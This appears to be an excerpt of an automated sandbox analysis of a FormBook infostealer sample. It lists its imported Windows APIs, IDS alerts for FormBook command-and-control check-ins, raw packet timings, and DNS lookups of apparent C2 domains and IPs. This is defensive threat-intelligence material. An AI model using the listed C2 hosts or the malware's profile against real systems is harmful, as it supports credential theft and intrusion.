ADVAPI32.dll | GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll | DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll | LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
Language of compilation system | Country where language is spoken
English | Great Britain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-05T19:39:33.610591+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.7 | 49753 | 104.21.77.71 | 80 | TCP
2024-12-05T19:39:50.538723+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49790 | 13.248.221.243 | 80 | TCP
2024-12-05T19:39:50.538723+0100 | 2856318 | ETPRO MALWARE FormBook CnC Checkin (POST) M4 | 1 | 192.168.2.7 | 49790 | 13.248.221.243 | 80 | TCP
2024-12-05T19:39:53.202380+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49800 | 13.248.221.243 | 80 | TCP
2024-12-05T19:39:55.875039+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49806 | 13.248.221.243 | 80 | TCP
2024-12-05T19:39:58.567032+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.7 | 49814 | 13.248.221.243 | 80 | TCP
2024-12-05T19:40:06.746206+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49834 | 163.44.185.183 | 80 | TCP
2024-12-05T19:40:09.421842+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49840 | 163.44.185.183 | 80 | TCP
2024-12-05T19:40:12.187654+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49846 | 163.44.185.183 | 80 | TCP
2024-12-05T19:40:14.756618+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.7 | 49852 | 163.44.185.183 | 80 | TCP
2024-12-05T19:40:21.936562+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49872 | 104.21.41.74 | 80 | TCP
2024-12-05T19:40:24.608338+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49880 | 104.21.41.74 | 80 | TCP
2024-12-05T19:40:27.264616+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49886 | 104.21.41.74 | 80 | TCP
2024-12-05T19:41:08.348736+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.7 | 49892 | 104.21.41.74 | 80 | TCP
2024-12-05T19:41:16.108628+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49984 | 85.159.66.93 | 80 | TCP
2024-12-05T19:41:18.770881+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49985 | 85.159.66.93 | 80 | TCP
2024-12-05T19:41:21.436794+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49986 | 85.159.66.93 | 80 | TCP
2024-12-05T19:41:23.933756+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.7 | 49987 | 85.159.66.93 | 80 | TCP
2024-12-05T19:41:31.389983+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49988 | 103.21.221.4 | 80 | TCP
2024-12-05T19:41:34.061876+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49989 | 103.21.221.4 | 80 | TCP
2024-12-05T19:41:36.718050+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49990 | 103.21.221.4 | 80 | TCP
2024-12-05T19:41:39.431492+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.7 | 49991 | 103.21.221.4 | 80 | TCP
2024-12-05T19:41:46.204411+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49992 | 104.21.62.184 | 80 | TCP
2024-12-05T19:41:48.859135+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49993 | 104.21.62.184 | 80 | TCP
2024-12-05T19:41:51.521368+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49994 | 104.21.62.184 | 80 | TCP
2024-12-05T19:41:54.185382+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.7 | 49995 | 104.21.62.184 | 80 | TCP
2024-12-05T19:42:01.171722+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49996 | 66.29.137.10 | 80 | TCP
2024-12-05T19:42:03.802758+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49997 | 66.29.137.10 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                            Dec 5, 2024 19:40:06.940495968 CET8049834163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:06.940538883 CET4983480192.168.2.7163.44.185.183
                                                            Dec 5, 2024 19:40:06.948781013 CET8049834163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:06.948863983 CET4983480192.168.2.7163.44.185.183
                                                            Dec 5, 2024 19:40:06.952348948 CET8049834163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:06.952398062 CET4983480192.168.2.7163.44.185.183
                                                            Dec 5, 2024 19:40:07.861762047 CET4984080192.168.2.7163.44.185.183
                                                            Dec 5, 2024 19:40:07.981832981 CET8049840163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:07.981972933 CET4984080192.168.2.7163.44.185.183
                                                            Dec 5, 2024 19:40:07.997749090 CET4984080192.168.2.7163.44.185.183
                                                            Dec 5, 2024 19:40:08.117733955 CET8049840163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:09.421608925 CET8049840163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:09.421771049 CET8049840163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:09.421782017 CET8049840163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:09.421842098 CET4984080192.168.2.7163.44.185.183
                                                            Dec 5, 2024 19:40:09.421875954 CET8049840163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:09.421888113 CET8049840163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:09.421905041 CET8049840163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:09.421916008 CET8049840163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:09.421926975 CET8049840163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:09.422019958 CET4984080192.168.2.7163.44.185.183
                                                            Dec 5, 2024 19:40:09.422019958 CET4984080192.168.2.7163.44.185.183
                                                            Dec 5, 2024 19:40:09.422504902 CET8049840163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:09.422517061 CET8049840163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:09.422552109 CET4984080192.168.2.7163.44.185.183
                                                            Dec 5, 2024 19:40:09.514529943 CET4984080192.168.2.7163.44.185.183
                                                            Dec 5, 2024 19:40:09.542701006 CET8049840163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:09.542932987 CET4984080192.168.2.7163.44.185.183
                                                            Dec 5, 2024 19:40:09.591574907 CET8049840163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:09.591614962 CET8049840163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:09.591870070 CET4984080192.168.2.7163.44.185.183
                                                            Dec 5, 2024 19:40:09.591871023 CET4984080192.168.2.7163.44.185.183
                                                            Dec 5, 2024 19:40:09.614664078 CET8049840163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:09.614681005 CET8049840163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:09.614790916 CET4984080192.168.2.7163.44.185.183
                                                            Dec 5, 2024 19:40:09.614790916 CET4984080192.168.2.7163.44.185.183
                                                            Dec 5, 2024 19:40:09.616842985 CET8049840163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:09.616913080 CET4984080192.168.2.7163.44.185.183
                                                            Dec 5, 2024 19:40:09.616945982 CET8049840163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:09.616986990 CET4984080192.168.2.7163.44.185.183
                                                            Dec 5, 2024 19:40:09.625215054 CET8049840163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:09.625262022 CET4984080192.168.2.7163.44.185.183
                                                            Dec 5, 2024 19:40:09.628789902 CET8049840163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:09.628845930 CET4984080192.168.2.7163.44.185.183
                                                            Dec 5, 2024 19:40:10.533938885 CET4984680192.168.2.7163.44.185.183
                                                            Dec 5, 2024 19:40:10.653819084 CET8049846163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:10.653923988 CET4984680192.168.2.7163.44.185.183
                                                            Dec 5, 2024 19:40:10.670095921 CET4984680192.168.2.7163.44.185.183
                                                            Dec 5, 2024 19:40:10.790082932 CET8049846163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:10.790115118 CET8049846163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:12.187654018 CET4984680192.168.2.7163.44.185.183
                                                            Dec 5, 2024 19:40:12.253809929 CET8049846163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:12.253829002 CET8049846163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:12.253845930 CET8049846163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:12.253895998 CET8049846163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:12.253907919 CET8049846163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:12.253918886 CET8049846163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:12.253940105 CET8049846163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:12.253956079 CET4984680192.168.2.7163.44.185.183
                                                            Dec 5, 2024 19:40:12.253958941 CET8049846163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:12.253983974 CET4984680192.168.2.7163.44.185.183
                                                            Dec 5, 2024 19:40:12.253983974 CET4984680192.168.2.7163.44.185.183
                                                            Dec 5, 2024 19:40:12.254024982 CET4984680192.168.2.7163.44.185.183
                                                            Dec 5, 2024 19:40:12.254036903 CET4984680192.168.2.7163.44.185.183
                                                            Dec 5, 2024 19:40:12.254038095 CET4984680192.168.2.7163.44.185.183
                                                            Dec 5, 2024 19:40:12.254209042 CET8049846163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:12.254220009 CET8049846163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:12.254232883 CET4984680192.168.2.7163.44.185.183
                                                            Dec 5, 2024 19:40:12.254244089 CET4984680192.168.2.7163.44.185.183
                                                            Dec 5, 2024 19:40:12.254271030 CET4984680192.168.2.7163.44.185.183
                                                            Dec 5, 2024 19:40:12.353203058 CET8049846163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:12.353274107 CET4984680192.168.2.7163.44.185.183
                                                            Dec 5, 2024 19:40:13.205251932 CET4985280192.168.2.7163.44.185.183
                                                            Dec 5, 2024 19:40:13.324953079 CET8049852163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:13.325191021 CET4985280192.168.2.7163.44.185.183
                                                            Dec 5, 2024 19:40:13.334870100 CET4985280192.168.2.7163.44.185.183
                                                            Dec 5, 2024 19:40:13.454806089 CET8049852163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:14.756237030 CET8049852163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:14.756263971 CET8049852163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:14.756285906 CET8049852163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:14.756300926 CET8049852163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:14.756536007 CET8049852163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:14.756547928 CET8049852163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:14.756560087 CET8049852163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:14.756618023 CET4985280192.168.2.7163.44.185.183
                                                            Dec 5, 2024 19:40:14.756656885 CET4985280192.168.2.7163.44.185.183
                                                            Dec 5, 2024 19:40:14.756881952 CET8049852163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:14.756897926 CET8049852163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:14.756946087 CET4985280192.168.2.7163.44.185.183
                                                            Dec 5, 2024 19:40:14.757006884 CET8049852163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:14.757095098 CET4985280192.168.2.7163.44.185.183
                                                            Dec 5, 2024 19:40:14.876812935 CET8049852163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:14.876836061 CET8049852163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:14.877088070 CET4985280192.168.2.7163.44.185.183
                                                            Dec 5, 2024 19:40:14.880789042 CET8049852163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:14.920840979 CET4985280192.168.2.7163.44.185.183
                                                            Dec 5, 2024 19:40:14.948446035 CET8049852163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:14.948491096 CET8049852163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:14.948806047 CET4985280192.168.2.7163.44.185.183
                                                            Dec 5, 2024 19:40:14.952681065 CET8049852163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:14.952713966 CET8049852163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:14.952946901 CET4985280192.168.2.7163.44.185.183
                                                            Dec 5, 2024 19:40:14.961159945 CET8049852163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:14.961190939 CET8049852163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:14.961375952 CET4985280192.168.2.7163.44.185.183
                                                            Dec 5, 2024 19:40:14.965362072 CET8049852163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:14.965591908 CET4985280192.168.2.7163.44.185.183
                                                            Dec 5, 2024 19:40:14.966609955 CET4985280192.168.2.7163.44.185.183
                                                            Dec 5, 2024 19:40:15.086338997 CET8049852163.44.185.183192.168.2.7
                                                            Dec 5, 2024 19:40:20.297852993 CET4987280192.168.2.7104.21.41.74
                                                            Dec 5, 2024 19:40:20.417604923 CET8049872104.21.41.74192.168.2.7
                                                            Dec 5, 2024 19:40:20.417684078 CET4987280192.168.2.7104.21.41.74
                                                            Dec 5, 2024 19:40:20.432786942 CET4987280192.168.2.7104.21.41.74
                                                            Dec 5, 2024 19:40:20.552671909 CET8049872104.21.41.74192.168.2.7
                                                            Dec 5, 2024 19:40:21.936562061 CET4987280192.168.2.7104.21.41.74
                                                            Dec 5, 2024 19:40:22.092643976 CET8049872104.21.41.74192.168.2.7
                                                            Dec 5, 2024 19:40:22.092724085 CET4987280192.168.2.7104.21.41.74
                                                            Dec 5, 2024 19:40:22.955240011 CET4988080192.168.2.7104.21.41.74
                                                            Dec 5, 2024 19:40:23.075930119 CET8049880104.21.41.74192.168.2.7
                                                            Dec 5, 2024 19:40:23.079726934 CET4988080192.168.2.7104.21.41.74
                                                            Dec 5, 2024 19:40:23.094743967 CET4988080192.168.2.7104.21.41.74
                                                            Dec 5, 2024 19:40:23.214601994 CET8049880104.21.41.74192.168.2.7
                                                            Dec 5, 2024 19:40:24.608338118 CET4988080192.168.2.7104.21.41.74
                                                            Dec 5, 2024 19:40:24.728915930 CET8049880104.21.41.74192.168.2.7
                                                            Dec 5, 2024 19:40:24.729041100 CET4988080192.168.2.7104.21.41.74
                                                            Dec 5, 2024 19:40:25.627300024 CET4988680192.168.2.7104.21.41.74
                                                            Dec 5, 2024 19:40:25.748466015 CET8049886104.21.41.74192.168.2.7
                                                            Dec 5, 2024 19:40:25.748620033 CET4988680192.168.2.7104.21.41.74
                                                            Dec 5, 2024 19:40:25.763094902 CET4988680192.168.2.7104.21.41.74
                                                            Dec 5, 2024 19:40:25.882894039 CET8049886104.21.41.74192.168.2.7
                                                            Dec 5, 2024 19:40:25.882982969 CET8049886104.21.41.74192.168.2.7
                                                            Dec 5, 2024 19:40:27.264616013 CET4988680192.168.2.7104.21.41.74
                                                            Dec 5, 2024 19:40:27.384884119 CET8049886104.21.41.74192.168.2.7
                                                            Dec 5, 2024 19:40:27.385047913 CET4988680192.168.2.7104.21.41.74
                                                            Dec 5, 2024 19:40:28.283328056 CET4989280192.168.2.7104.21.41.74
                                                            Dec 5, 2024 19:40:28.403343916 CET8049892104.21.41.74192.168.2.7
                                                            Dec 5, 2024 19:40:28.403434992 CET4989280192.168.2.7104.21.41.74
                                                            Dec 5, 2024 19:40:28.420234919 CET4989280192.168.2.7104.21.41.74
                                                            Dec 5, 2024 19:40:28.540129900 CET8049892104.21.41.74192.168.2.7
                                                            Dec 5, 2024 19:41:08.347903967 CET8049892104.21.41.74192.168.2.7
                                                            Dec 5, 2024 19:41:08.348505974 CET8049892104.21.41.74192.168.2.7
                                                            Dec 5, 2024 19:41:08.348736048 CET4989280192.168.2.7104.21.41.74
                                                            Dec 5, 2024 19:41:08.351520061 CET4989280192.168.2.7104.21.41.74
                                                            Dec 5, 2024 19:41:08.471679926 CET8049892104.21.41.74192.168.2.7
                                                            Dec 5, 2024 19:41:14.459844112 CET4998480192.168.2.785.159.66.93
                                                            Dec 5, 2024 19:41:14.579772949 CET804998485.159.66.93192.168.2.7
                                                            Dec 5, 2024 19:41:14.579875946 CET4998480192.168.2.785.159.66.93
                                                            Dec 5, 2024 19:41:14.595369101 CET4998480192.168.2.785.159.66.93
                                                            Dec 5, 2024 19:41:14.715326071 CET804998485.159.66.93192.168.2.7
                                                            Dec 5, 2024 19:41:16.108628035 CET4998480192.168.2.785.159.66.93
                                                            Dec 5, 2024 19:41:16.228933096 CET804998485.159.66.93192.168.2.7
                                                            Dec 5, 2024 19:41:16.229176044 CET4998480192.168.2.785.159.66.93
                                                            Dec 5, 2024 19:41:17.127412081 CET4998580192.168.2.785.159.66.93
                                                            Dec 5, 2024 19:41:17.247215986 CET804998585.159.66.93192.168.2.7
                                                            Dec 5, 2024 19:41:17.247488976 CET4998580192.168.2.785.159.66.93
                                                            Dec 5, 2024 19:41:17.262343884 CET4998580192.168.2.785.159.66.93
                                                            Dec 5, 2024 19:41:17.382124901 CET804998585.159.66.93192.168.2.7
                                                            Dec 5, 2024 19:41:18.770880938 CET4998580192.168.2.785.159.66.93
                                                            Dec 5, 2024 19:41:18.903022051 CET804998585.159.66.93192.168.2.7
                                                            Dec 5, 2024 19:41:18.903187037 CET4998580192.168.2.785.159.66.93
                                                            Dec 5, 2024 19:41:19.786468983 CET4998680192.168.2.785.159.66.93
                                                            Dec 5, 2024 19:41:19.906366110 CET804998685.159.66.93192.168.2.7
                                                            Dec 5, 2024 19:41:19.906455040 CET4998680192.168.2.785.159.66.93
                                                            Dec 5, 2024 19:41:19.923261881 CET4998680192.168.2.785.159.66.93
                                                            Dec 5, 2024 19:41:20.043070078 CET804998685.159.66.93192.168.2.7
                                                            Dec 5, 2024 19:41:20.043354988 CET804998685.159.66.93192.168.2.7
                                                            Dec 5, 2024 19:41:21.436794043 CET4998680192.168.2.785.159.66.93
                                                            Dec 5, 2024 19:41:21.559083939 CET804998685.159.66.93192.168.2.7
                                                            Dec 5, 2024 19:41:21.559264898 CET4998680192.168.2.785.159.66.93
                                                            Dec 5, 2024 19:41:22.455673933 CET4998780192.168.2.785.159.66.93
                                                            Dec 5, 2024 19:41:22.576087952 CET804998785.159.66.93192.168.2.7
                                                            Dec 5, 2024 19:41:22.576292992 CET4998780192.168.2.785.159.66.93
                                                            Dec 5, 2024 19:41:22.591773987 CET4998780192.168.2.785.159.66.93
                                                            Dec 5, 2024 19:41:22.712162018 CET804998785.159.66.93192.168.2.7
                                                            Dec 5, 2024 19:41:23.933490038 CET804998785.159.66.93192.168.2.7
                                                            Dec 5, 2024 19:41:23.933620930 CET804998785.159.66.93192.168.2.7
                                                            Dec 5, 2024 19:41:23.933756113 CET4998780192.168.2.785.159.66.93
                                                            Dec 5, 2024 19:41:23.936492920 CET4998780192.168.2.785.159.66.93
                                                            Dec 5, 2024 19:41:24.056232929 CET804998785.159.66.93192.168.2.7
                                                            Dec 5, 2024 19:41:29.737926006 CET4998880192.168.2.7103.21.221.4
                                                            Dec 5, 2024 19:41:29.858040094 CET8049988103.21.221.4192.168.2.7
                                                            Dec 5, 2024 19:41:29.858234882 CET4998880192.168.2.7103.21.221.4
                                                            Dec 5, 2024 19:41:29.873936892 CET4998880192.168.2.7103.21.221.4
                                                            Dec 5, 2024 19:41:29.993849039 CET8049988103.21.221.4192.168.2.7
                                                            Dec 5, 2024 19:41:31.389982939 CET4998880192.168.2.7103.21.221.4
                                                            Dec 5, 2024 19:41:31.426230907 CET8049988103.21.221.4192.168.2.7
                                                            Dec 5, 2024 19:41:31.426390886 CET4998880192.168.2.7103.21.221.4
                                                            Dec 5, 2024 19:41:31.426459074 CET8049988103.21.221.4192.168.2.7
                                                            Dec 5, 2024 19:41:31.426529884 CET4998880192.168.2.7103.21.221.4
                                                            Dec 5, 2024 19:41:31.509979963 CET8049988103.21.221.4192.168.2.7
                                                            Dec 5, 2024 19:41:31.513967037 CET4998880192.168.2.7103.21.221.4
                                                            Dec 5, 2024 19:41:32.408885002 CET4998980192.168.2.7103.21.221.4
                                                            Dec 5, 2024 19:41:32.528760910 CET8049989103.21.221.4192.168.2.7
                                                            Dec 5, 2024 19:41:32.529073000 CET4998980192.168.2.7103.21.221.4
                                                            Dec 5, 2024 19:41:32.545327902 CET4998980192.168.2.7103.21.221.4
                                                            Dec 5, 2024 19:41:32.665510893 CET8049989103.21.221.4192.168.2.7
                                                            Dec 5, 2024 19:41:34.061876059 CET4998980192.168.2.7103.21.221.4
                                                            Dec 5, 2024 19:41:34.089931965 CET8049989103.21.221.4192.168.2.7
                                                            Dec 5, 2024 19:41:34.090142012 CET4998980192.168.2.7103.21.221.4
                                                            Dec 5, 2024 19:41:34.090292931 CET8049989103.21.221.4192.168.2.7
                                                            Dec 5, 2024 19:41:34.090351105 CET4998980192.168.2.7103.21.221.4
                                                            Dec 5, 2024 19:41:34.183607101 CET8049989103.21.221.4192.168.2.7
                                                            Dec 5, 2024 19:41:34.183702946 CET4998980192.168.2.7103.21.221.4
                                                            Dec 5, 2024 19:41:35.080739975 CET4999080192.168.2.7103.21.221.4
                                                            Dec 5, 2024 19:41:35.200630903 CET8049990103.21.221.4192.168.2.7
                                                            Dec 5, 2024 19:41:35.200846910 CET4999080192.168.2.7103.21.221.4
                                                            Dec 5, 2024 19:41:35.215956926 CET4999080192.168.2.7103.21.221.4
                                                            Dec 5, 2024 19:41:35.336159945 CET8049990103.21.221.4192.168.2.7
                                                            Dec 5, 2024 19:41:35.336194038 CET8049990103.21.221.4192.168.2.7
                                                            Dec 5, 2024 19:41:36.718050003 CET4999080192.168.2.7103.21.221.4
                                                            Dec 5, 2024 19:41:36.764065981 CET8049990103.21.221.4192.168.2.7
                                                            Dec 5, 2024 19:41:36.764178038 CET4999080192.168.2.7103.21.221.4
                                                            Dec 5, 2024 19:41:36.764261961 CET8049990103.21.221.4192.168.2.7
                                                            Dec 5, 2024 19:41:36.764324903 CET4999080192.168.2.7103.21.221.4
                                                            Dec 5, 2024 19:41:36.837835073 CET8049990103.21.221.4192.168.2.7
                                                            Dec 5, 2024 19:41:36.837924004 CET4999080192.168.2.7103.21.221.4
                                                            Dec 5, 2024 19:41:37.736789942 CET4999180192.168.2.7103.21.221.4
                                                            Dec 5, 2024 19:41:37.856492996 CET8049991103.21.221.4192.168.2.7
                                                            Dec 5, 2024 19:41:37.856643915 CET4999180192.168.2.7103.21.221.4
                                                            Dec 5, 2024 19:41:37.865684032 CET4999180192.168.2.7103.21.221.4
                                                            Dec 5, 2024 19:41:37.985367060 CET8049991103.21.221.4192.168.2.7
                                                            Dec 5, 2024 19:41:39.431226969 CET8049991103.21.221.4192.168.2.7
                                                            Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                            Dec 5, 2024 19:39:31.759701967 CET | 192.168.2.7 | 1.1.1.1 | 0xcb91 | Standard query (0) | www.aziziyeescortg.xyz | A (IP address) | IN (0x0001) | false
                                                            Dec 5, 2024 19:39:48.658642054 CET | 192.168.2.7 | 1.1.1.1 | 0x71c2 | Standard query (0) | www.grandesofertas.fun | A (IP address) | IN (0x0001) | false
                                                            Dec 5, 2024 19:40:03.621033907 CET | 192.168.2.7 | 1.1.1.1 | 0x3507 | Standard query (0) | www.sankan-fukushi.info | A (IP address) | IN (0x0001) | false
                                                            Dec 5, 2024 19:40:04.608491898 CET | 192.168.2.7 | 1.1.1.1 | 0x3507 | Standard query (0) | www.sankan-fukushi.info | A (IP address) | IN (0x0001) | false
                                                            Dec 5, 2024 19:40:19.973690987 CET | 192.168.2.7 | 1.1.1.1 | 0xd617 | Standard query (0) | www.conansog.shop | A (IP address) | IN (0x0001) | false
                                                            Dec 5, 2024 19:41:13.363192081 CET | 192.168.2.7 | 1.1.1.1 | 0xf1dd | Standard query (0) | www.beythome.online | A (IP address) | IN (0x0001) | false
                                                            Dec 5, 2024 19:41:14.374567032 CET | 192.168.2.7 | 1.1.1.1 | 0xf1dd | Standard query (0) | www.beythome.online | A (IP address) | IN (0x0001) | false
                                                            Dec 5, 2024 19:41:28.956259966 CET | 192.168.2.7 | 1.1.1.1 | 0x62af | Standard query (0) | www.tempatmudisini06.click | A (IP address) | IN (0x0001) | false
                                                            Dec 5, 2024 19:41:44.440459967 CET | 192.168.2.7 | 1.1.1.1 | 0xdf88 | Standard query (0) | www.questmatch.pro | A (IP address) | IN (0x0001) | false
                                                            Dec 5, 2024 19:41:59.205957890 CET | 192.168.2.7 | 1.1.1.1 | 0xfed7 | Standard query (0) | www.callyur.shop | A (IP address) | IN (0x0001) | false
                                                            Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                            Dec 5, 2024 19:39:32.152839899 CET | 1.1.1.1 | 192.168.2.7 | 0xcb91 | No error (0) | www.aziziyeescortg.xyz | - | 104.21.77.71 | A (IP address) | IN (0x0001) | false
                                                            Dec 5, 2024 19:39:32.152839899 CET | 1.1.1.1 | 192.168.2.7 | 0xcb91 | No error (0) | www.aziziyeescortg.xyz | - | 172.67.205.93 | A (IP address) | IN (0x0001) | false
                                                            Dec 5, 2024 19:39:49.249794960 CET | 1.1.1.1 | 192.168.2.7 | 0x71c2 | No error (0) | www.grandesofertas.fun | entri-domains.clickmax.io | - | CNAME (Canonical name) | IN (0x0001) | false
                                                            Dec 5, 2024 19:39:49.249794960 CET | 1.1.1.1 | 192.168.2.7 | 0x71c2 | No error (0) | entri-domains.clickmax.io | ssl.goentri.com | - | CNAME (Canonical name) | IN (0x0001) | false
